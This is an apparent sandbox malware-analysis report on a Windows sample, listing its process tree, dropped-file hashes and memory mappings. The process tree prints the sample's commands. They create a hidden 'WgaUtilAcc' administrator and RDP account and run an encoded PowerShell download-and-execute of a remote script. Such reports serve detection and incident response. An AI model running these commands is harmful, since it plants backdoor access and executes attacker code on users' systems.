- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc OmWt8GJ5 /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc OmWt8GJ5 /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc OmWt8GJ5 /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" EZNBLWLT$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" EZNBLWLT$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EZNBLWLT$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc OmWt8GJ51⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc OmWt8GJ52⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc OmWt8GJ53⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\49D.exeMD5
5dec7029dda901f99d02a1cb08d6b3ab
SHA18561c81e8fab7889eb13ab29450bed82878e78c9
SHA2566a61b992773f571c45f2d1087a56817dd5c1f3a90ca2965cc5c7319b33f3890b
SHA51209e5856113a7b073568e878d1de74c834e318dd05b95afe8729a3008b4cc1efc0b1a6a9c21b25c0b1dadec3d6de5b5bc4ef84523f454591717b6f24fe5dffaca
-
C:\Users\Admin\AppData\Local\Temp\49D.exeMD5
5dec7029dda901f99d02a1cb08d6b3ab
SHA18561c81e8fab7889eb13ab29450bed82878e78c9
SHA2566a61b992773f571c45f2d1087a56817dd5c1f3a90ca2965cc5c7319b33f3890b
SHA51209e5856113a7b073568e878d1de74c834e318dd05b95afe8729a3008b4cc1efc0b1a6a9c21b25c0b1dadec3d6de5b5bc4ef84523f454591717b6f24fe5dffaca
-
C:\Users\Admin\AppData\Local\Temp\B0DD.exeMD5
3ba1d635fed88d8af279be91b7007bae
SHA162a1d59c746cdb51e699114f410749384a70cf73
SHA2563151b115c3370d5360286bfe3a053d0d543f0e5d21faa68fee167224e68d115a
SHA51283254fb484bd40740e5e0483dcc7fd8ce612033b00238494fdcdc5a5dcb3503195e0e2694edd5d848c07e2ddc61cafdb7d331afc4792ccd788837ebbce18bfeb
-
C:\Users\Admin\AppData\Local\Temp\B0DD.exeMD5
3ba1d635fed88d8af279be91b7007bae
SHA162a1d59c746cdb51e699114f410749384a70cf73
SHA2563151b115c3370d5360286bfe3a053d0d543f0e5d21faa68fee167224e68d115a
SHA51283254fb484bd40740e5e0483dcc7fd8ce612033b00238494fdcdc5a5dcb3503195e0e2694edd5d848c07e2ddc61cafdb7d331afc4792ccd788837ebbce18bfeb
-
C:\Users\Admin\AppData\Local\Temp\C1E6.exeMD5
f80418f12c03a56ac2e8d8b189c13750
SHA1cd0b728375e4e178b50bca8ad65ce79aede30d37
SHA256cbc5d7db8e27b2369a1d83c2d8615c1dbb6263e8b80c4b12a86493c9df093716
SHA512e3fb85cc08a94193528ecc760b58904df47aa302419267c5b3386468e1d7fdece63fee05d8d95a083637b70a24035d3123c94463111ba372b39fcc69787aa196
-
C:\Users\Admin\AppData\Local\Temp\C1E6.exeMD5
f80418f12c03a56ac2e8d8b189c13750
SHA1cd0b728375e4e178b50bca8ad65ce79aede30d37
SHA256cbc5d7db8e27b2369a1d83c2d8615c1dbb6263e8b80c4b12a86493c9df093716
SHA512e3fb85cc08a94193528ecc760b58904df47aa302419267c5b3386468e1d7fdece63fee05d8d95a083637b70a24035d3123c94463111ba372b39fcc69787aa196
-
C:\Users\Admin\AppData\Local\Temp\RES1FE3.tmpMD5
31207aecdec96ac3cebf834727526f24
SHA18088e931ae64d5f44fd6f1ea67dd124803d92579
SHA2564f2de223fcd3e1b25b5fd23bf4a9ff1935e311f6d047dafccc3af3438c8f60e9
SHA51245e5d1dc9ceb8681cd00889748f7ec5b7a421e0d90d0c6c98bb76e7ab424398865ea13e636624d3fb2ca8c240102acd834d3180287638ae4fb64b65305c00f48
-
C:\Users\Admin\AppData\Local\Temp\RES25DE.tmpMD5
1316e9ada3fc30ae3f4811beaafa6697
SHA11e18cdb9fa4a286f113183f5fff65da23e68bb9b
SHA25604ca498e8e8a9dadc346e1a9b90e043b8163e8d1fb8eefc6bf91703614867342
SHA512288d2fd5d6d6fd2b45f51b833c15a5e92b32c2348f2843bfb81961ccc724cd937d8cfa014c3caf9d9ac2dc57900cb38135534c5a92d9852c57df0627e2abfdf2
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1MD5
854b2dfc0a28f2959b1d2fc363a4e318
SHA1ce1753052c5bdad56708ec75d8085b2c597df6c1
SHA2567135370ad5c4279486173fa5d0de73ea06dd814e4f8df98f80624f6f8b8c231c
SHA512b0204091d6f89877c808c2c1db97c3723f063eace68d54b25da674b5971d0a2f7d60549923097c36dedc8c1cb2f77dfdd1dfb4df60f16682652a6755e287bfd6
-
C:\Users\Admin\AppData\Local\Temp\n4ty3n35\n4ty3n35.dllMD5
35071c4bfcf5b09e6cf1f10457e0785a
SHA16381674d14919e11b731864bee67ba632e6c510a
SHA256d21c174b823406a4b84128bbe35f9394031752cceb7801ccc8a2d96063704892
SHA5123bf12aec8b054cc0d92971669fbf782ad0eb55d58dcbed126a7422fa19b910fb32ad2457707878aacbd881ae016c6364baa074ee8684966e92ce9a9c475a42f8
-
C:\Users\Admin\AppData\Local\Temp\qp0crqtk\qp0crqtk.dllMD5
7e258de36259a1ab4f2d9a2f09050f02
SHA173621cf2a77b1fb7401c1cc8efdcdce7452f03d0
SHA25699944f07767d84fe8758eac8458a9cf25a5d4f99f5c1cda88bb48d2ab4e33436
SHA51268b08a7514229162acc988a4ae87fb5033dbf50da89e9c7b19a54e32eaffa19c7397090f46152221e7c56033babbc4260d69518f9ec99a97ff167af4091668e6
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
\??\c:\Users\Admin\AppData\Local\Temp\n4ty3n35\CSCDDE27C93210C430DAAB0D0F2814DD1C5.TMPMD5
6d30b28f1fb56d7f7e7c89b2dd685d61
SHA158861eba96066ad9976d469a84f623adf96386ba
SHA25647626e5602568ef2a4f1cbbcd9bc8d18ae65a42b583391d4225d370923b7f652
SHA51253a622f4338aa782d80d0b3885b1030e2825b611e4741c6ded9092f5cbfc8d1f95e17eca1f32e12c1adf6feecd069cc72dccbc612abc563339a86a9ce73b6d68
-
\??\c:\Users\Admin\AppData\Local\Temp\n4ty3n35\n4ty3n35.0.csMD5
e0f116150ceec4ea8bb954d973e3b649
SHA186a8e81c70f4cc265f13e8760cf8888a6996f0fd
SHA256511ea5f70cbc2f5d875f7dd035cb5203b119e22c3b131cc551d21d151c909d54
SHA51232f01c2658c0314709e5dedec9a6d9911d0a0d777f6856569e043f705d036ab10e996732303ecdffea912e783b79463bdc0ffaa4b8c9d7a1e06a9073cd263bec
-
\??\c:\Users\Admin\AppData\Local\Temp\n4ty3n35\n4ty3n35.cmdlineMD5
da69c6212455ae71b0b3e16f4e308b0b
SHA1fecd3078198b83428c62aaaa0129a91bc2956ec4
SHA2561b79f1d5086429e718838daab6dc0937a2ed449cc279e7e2b5455394acc0c4a2
SHA5123f9e88eddf3286c8e72143a0e714362c415326b12b10450764f4db38925f9a07e5b3e73cd89943f93cb5ba5d26d99feca20dd4b79b88542966eaba681170885c
-
\??\c:\Users\Admin\AppData\Local\Temp\qp0crqtk\CSC45ED1FB13AA1429D92B43D88258E46CE.TMPMD5
894ebc425193250f673d20670b7b6937
SHA1cd9f0a72bed7bafb1e2df2bb3795c7aff78e9138
SHA256c7fe134d3b223a652da58a7e48239a3bd8bd414b395090325619b871e6421d1f
SHA512269c383bef32e7cf9c8464478897b58b887b5cd1231600dda48372f4ce0f596007f4122fc8e370d5dd2ce916765e345fbf0642bd06ad066afbfc886d0515a037
-
\??\c:\Users\Admin\AppData\Local\Temp\qp0crqtk\qp0crqtk.0.csMD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\qp0crqtk\qp0crqtk.cmdlineMD5
8a32ca540af8aebc854d84365ae4c38f
SHA1799b828911ffc264c2bd4bcdc89a886cef4ba533
SHA2568867d073d1e02693e39b53eb7b2d108678bbc660e329e4f1a9c88fc38a2dd85b
SHA512fc3bd228084f5eeec25b69a53af2ec8098a6d633b5e9f3e3052adfc4a43b69e6d5dc9f812148bbb9db5fcd09608de11aeb23435370bff407bdbdec65cdcc145e
-
\Windows\Branding\mediasrv.pngMD5
83bd2c45f1faf20a77579cbb8765c2b3
SHA1fe01b295c1005f4cbc0cfcb277dac5e7c443622c
SHA256ca7ce804ab35bf65eb6f6e1501afbd506520bbe9bd04710d5efe0e57377a9809
SHA512e0ac8e2d79841e18fedfed993d6e0bedb169a2ca57092292ac831667dedddbca8b90619f977d449d9595adbb9efd48487940fced5eaa38ef17366ec7075da57c
-
\Windows\Branding\mediasvc.pngMD5
af4e893deae35128088534aea49a1b74
SHA1ce25e8e738978a2106e3464a7a4bf0345e60fd31
SHA25676dd1fb220473c4167a73d7202943fda2109da475e515f4056a03bb01318f22d
SHA5123115d385ec08548337b28b6b4f773578e9548d418b30f1f276f6a835a203ef497f0d23a7282f2fc7aceda73099eb4c4535c17c4842b542bd1867320f07319b97
-
memory/700-397-0x0000000000000000-mapping.dmp
-
memory/744-414-0x0000000000000000-mapping.dmp
-
memory/1120-350-0x0000000000000000-mapping.dmp
-
memory/1164-129-0x0000000004940000-0x0000000004941000-memory.dmpFilesize
4KB
-
memory/1164-128-0x0000000004900000-0x0000000004901000-memory.dmpFilesize
4KB
-
memory/1164-127-0x0000000004860000-0x0000000004E66000-memory.dmpFilesize
6.0MB
-
memory/1164-126-0x00000000049D0000-0x00000000049D1000-memory.dmpFilesize
4KB
-
memory/1164-125-0x00000000048A0000-0x00000000048A1000-memory.dmpFilesize
4KB
-
memory/1164-124-0x0000000004E70000-0x0000000004E71000-memory.dmpFilesize
4KB
-
memory/1164-122-0x00000000000A0000-0x00000000000A1000-memory.dmpFilesize
4KB
-
memory/1164-119-0x0000000000000000-mapping.dmp
-
memory/1264-189-0x000001ED637B0000-0x000001ED637B1000-memory.dmpFilesize
4KB
-
memory/1264-190-0x000001ED46E30000-0x000001ED46E32000-memory.dmpFilesize
8KB
-
memory/1264-150-0x000001ED46E30000-0x000001ED46E32000-memory.dmpFilesize
8KB
-
memory/1264-151-0x000001ED46E30000-0x000001ED46E32000-memory.dmpFilesize
8KB
-
memory/1264-152-0x000001ED46E30000-0x000001ED46E32000-memory.dmpFilesize
8KB
-
memory/1264-153-0x000001ED46E30000-0x000001ED46E32000-memory.dmpFilesize
8KB
-
memory/1264-154-0x000001ED62F00000-0x000001ED62F01000-memory.dmpFilesize
4KB
-
memory/1264-155-0x000001ED46E30000-0x000001ED46E32000-memory.dmpFilesize
8KB
-
memory/1264-148-0x000001ED46E30000-0x000001ED46E32000-memory.dmpFilesize
8KB
-
memory/1264-158-0x000001ED60DA0000-0x000001ED60DA2000-memory.dmpFilesize
8KB
-
memory/1264-160-0x000001ED60DA3000-0x000001ED60DA5000-memory.dmpFilesize
8KB
-
memory/1264-149-0x000001ED48B20000-0x000001ED48B21000-memory.dmpFilesize
4KB
-
memory/1264-147-0x000001ED46E30000-0x000001ED46E32000-memory.dmpFilesize
8KB
-
memory/1264-146-0x000001ED46E30000-0x000001ED46E32000-memory.dmpFilesize
8KB
-
memory/1264-167-0x000001ED60DA6000-0x000001ED60DA8000-memory.dmpFilesize
8KB
-
memory/1264-191-0x000001ED46E30000-0x000001ED46E32000-memory.dmpFilesize
8KB
-
memory/1264-145-0x000001ED46E30000-0x000001ED46E32000-memory.dmpFilesize
8KB
-
memory/1264-144-0x000001ED46E30000-0x000001ED46E32000-memory.dmpFilesize
8KB
-
memory/1264-143-0x0000000000000000-mapping.dmp
-
memory/1264-172-0x000001ED60D80000-0x000001ED60D81000-memory.dmpFilesize
4KB
-
memory/1264-188-0x000001ED63420000-0x000001ED63421000-memory.dmpFilesize
4KB
-
memory/1264-184-0x000001ED46E30000-0x000001ED46E32000-memory.dmpFilesize
8KB
-
memory/1264-183-0x000001ED60DA8000-0x000001ED60DA9000-memory.dmpFilesize
4KB
-
memory/1264-182-0x000001ED46E30000-0x000001ED46E32000-memory.dmpFilesize
8KB
-
memory/1264-181-0x000001ED62EA0000-0x000001ED62EA1000-memory.dmpFilesize
4KB
-
memory/1268-398-0x0000000000000000-mapping.dmp
-
memory/1328-413-0x0000000000000000-mapping.dmp
-
memory/1412-133-0x0000000000E30000-0x0000000000E75000-memory.dmpFilesize
276KB
-
memory/1412-130-0x0000000000000000-mapping.dmp
-
memory/1468-393-0x0000000000000000-mapping.dmp
-
memory/1476-388-0x0000000000000000-mapping.dmp
-
memory/1548-404-0x0000000000000000-mapping.dmp
-
memory/1684-416-0x0000000000000000-mapping.dmp
-
memory/1688-497-0x0000000000000000-mapping.dmp
-
memory/1768-405-0x0000000000000000-mapping.dmp
-
memory/1776-417-0x0000000000000000-mapping.dmp
-
memory/1780-394-0x0000000000000000-mapping.dmp
-
memory/1812-207-0x0000022E1C053000-0x0000022E1C055000-memory.dmpFilesize
8KB
-
memory/1812-199-0x0000022E020E0000-0x0000022E020E2000-memory.dmpFilesize
8KB
-
memory/1812-200-0x0000022E020E0000-0x0000022E020E2000-memory.dmpFilesize
8KB
-
memory/1812-201-0x0000022E020E0000-0x0000022E020E2000-memory.dmpFilesize
8KB
-
memory/1812-202-0x0000022E020E0000-0x0000022E020E2000-memory.dmpFilesize
8KB
-
memory/1812-204-0x0000022E020E0000-0x0000022E020E2000-memory.dmpFilesize
8KB
-
memory/1812-205-0x0000022E020E0000-0x0000022E020E2000-memory.dmpFilesize
8KB
-
memory/1812-206-0x0000022E1C050000-0x0000022E1C052000-memory.dmpFilesize
8KB
-
memory/1812-198-0x0000022E020E0000-0x0000022E020E2000-memory.dmpFilesize
8KB
-
memory/1812-208-0x0000022E020E0000-0x0000022E020E2000-memory.dmpFilesize
8KB
-
memory/1812-209-0x0000022E020E0000-0x0000022E020E2000-memory.dmpFilesize
8KB
-
memory/1812-211-0x0000022E020E0000-0x0000022E020E2000-memory.dmpFilesize
8KB
-
memory/1812-215-0x0000022E1C056000-0x0000022E1C058000-memory.dmpFilesize
8KB
-
memory/1812-197-0x0000000000000000-mapping.dmp
-
memory/1940-400-0x0000000000000000-mapping.dmp
-
memory/1984-168-0x0000000000000000-mapping.dmp
-
memory/2032-164-0x0000000000000000-mapping.dmp
-
memory/2136-411-0x0000000000000000-mapping.dmp
-
memory/2140-338-0x000002108A396000-0x000002108A398000-memory.dmpFilesize
8KB
-
memory/2140-304-0x000002108A390000-0x000002108A392000-memory.dmpFilesize
8KB
-
memory/2140-305-0x000002108A393000-0x000002108A395000-memory.dmpFilesize
8KB
-
memory/2140-287-0x0000000000000000-mapping.dmp
-
memory/2140-339-0x000002108A398000-0x000002108A39A000-memory.dmpFilesize
8KB
-
memory/2212-403-0x0000000000000000-mapping.dmp
-
memory/2216-396-0x0000000000000000-mapping.dmp
-
memory/2220-395-0x0000000000000000-mapping.dmp
-
memory/2320-174-0x0000000000000000-mapping.dmp
-
memory/2504-389-0x0000000000000000-mapping.dmp
-
memory/2596-177-0x0000000000000000-mapping.dmp
-
memory/2760-117-0x0000000000400000-0x0000000000828000-memory.dmpFilesize
4.2MB
-
memory/2760-115-0x0000000000030000-0x0000000000038000-memory.dmpFilesize
32KB
-
memory/2760-116-0x00000000001C0000-0x00000000001C9000-memory.dmpFilesize
36KB
-
memory/2804-349-0x0000000000000000-mapping.dmp
-
memory/2880-118-0x0000000001040000-0x0000000001056000-memory.dmpFilesize
88KB
-
memory/3004-496-0x0000000000000000-mapping.dmp
-
memory/3128-406-0x0000000000000000-mapping.dmp
-
memory/3232-410-0x0000000000000000-mapping.dmp
-
memory/3428-407-0x0000000000000000-mapping.dmp
-
memory/3596-477-0x0000024C768F8000-0x0000024C768F9000-memory.dmpFilesize
4KB
-
memory/3596-429-0x0000024C768F0000-0x0000024C768F2000-memory.dmpFilesize
8KB
-
memory/3596-431-0x0000024C768F3000-0x0000024C768F5000-memory.dmpFilesize
8KB
-
memory/3596-438-0x0000024C768F6000-0x0000024C768F8000-memory.dmpFilesize
8KB
-
memory/3596-418-0x0000000000000000-mapping.dmp
-
memory/3684-399-0x0000000000000000-mapping.dmp
-
memory/3756-351-0x0000000000000000-mapping.dmp
-
memory/3772-262-0x000002217C576000-0x000002217C578000-memory.dmpFilesize
8KB
-
memory/3772-260-0x000002217C570000-0x000002217C572000-memory.dmpFilesize
8KB
-
memory/3772-261-0x000002217C573000-0x000002217C575000-memory.dmpFilesize
8KB
-
memory/3772-303-0x000002217C578000-0x000002217C57A000-memory.dmpFilesize
8KB
-
memory/3772-244-0x0000000000000000-mapping.dmp
-
memory/3796-412-0x0000000000000000-mapping.dmp
-
memory/3812-408-0x0000000000000000-mapping.dmp
-
memory/4040-140-0x00000220F6233000-0x00000220F6235000-memory.dmpFilesize
8KB
-
memory/4040-141-0x00000220F6235000-0x00000220F6236000-memory.dmpFilesize
4KB
-
memory/4040-139-0x00000220F6230000-0x00000220F6232000-memory.dmpFilesize
8KB
-
memory/4040-137-0x00000220F6520000-0x00000220F67EF000-memory.dmpFilesize
2.8MB
-
memory/4040-134-0x0000000000000000-mapping.dmp
-
memory/4040-142-0x00000220F6236000-0x00000220F6237000-memory.dmpFilesize
4KB
-
memory/4064-415-0x0000000000000000-mapping.dmp
-
memory/4076-409-0x0000000000000000-mapping.dmp